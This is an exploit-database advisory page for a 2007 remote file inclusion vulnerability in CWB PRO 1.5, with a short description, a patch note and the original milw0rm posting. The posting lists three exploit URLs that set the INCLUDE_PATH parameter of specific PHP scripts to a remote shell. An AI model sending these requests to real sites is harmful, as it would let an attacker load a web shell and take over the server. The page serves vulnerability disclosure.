header-logo
Suggest Exploit
vendor:
CWB PRO
by:
GloD_M = [Mahmood_ali]
N/A
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: CWB PRO
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

CWB PRO Version 1.5(INCLUDE_PATH) Remote File Include Vulnerabilities

The CWB PRO Version 1.5 has a vulnerability in the INCLUDE_PATH parameter of the cls_headline_prod.php, cls_listorders.php, and cls_viewpastorders.php scripts, which allows remote attackers to include arbitrary files from a remote server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites
# D.Script: http://codewalkers.com/codefiles/373_cwbs1.5_demo.zip 
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/include/cls_headline_prod.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_listorders.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_viewpastorders.php?INCLUDE_PATH=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

# milw0rm.com [2007-04-01]

Navigation

Suggest Exploit

Services By CQR